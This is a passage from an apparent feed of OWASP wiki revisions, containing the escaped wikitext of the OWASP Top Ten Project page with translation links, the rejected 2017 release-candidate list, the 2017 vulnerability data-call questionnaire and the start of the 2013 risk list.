*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=233935</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=233935"/>
				<updated>2017-09-30T20:13:31Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: fixed broken links to Github for 2017 draft&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 - Industry survey open and data call reopened==&lt;br /&gt;
&lt;br /&gt;
* All industry professionals are encouraged to complete this [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 &amp;lt;u&amp;gt;survey for new vulnerability categories&amp;lt;/u&amp;gt;] to help determine up to two items in the 2017 Top 10. The deadline for the survey is &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;.&lt;br /&gt;
* The data call for the 2017 Top 10 has been reopened. The  [https://goo.gl/forms/tLgyvK9O74r7wMkt2 &amp;lt;u&amp;gt;call for data&amp;lt;/u&amp;gt;] is now reopened to allow for additional data to be collected for analysis. The new deadline for the extended data call is &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;.&lt;br /&gt;
This [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html &amp;lt;u&amp;gt;OWASP blog posting&amp;lt;/u&amp;gt;] describes the process in detail. &lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – RC1 rejected==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ &amp;lt;u&amp;gt;OWASP Summit 2017&amp;lt;/u&amp;gt;], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html &amp;lt;u&amp;gt;outcomes of the OWASP Summit&amp;lt;/u&amp;gt;] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items (-&amp;gt; see OWASP Top 10 2017 - Industry survey open and data call reopened)&lt;br /&gt;
* Feedback on the mailing list has been moved to the [https://github.com/OWASP/Top10/issues &amp;lt;u&amp;gt;issues list&amp;lt;/u&amp;gt;] in GitHub, please continue to contribute feedback there. &lt;br /&gt;
* The new OWASP Top 10 2017 is to be released in late November 2017.&lt;br /&gt;
* New project leadership put in place.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- I think it makes sense just to delete this text - Neil Smithline&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 1 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
The following text is now outdated and has been left strictly for historical purposes.&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information==&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
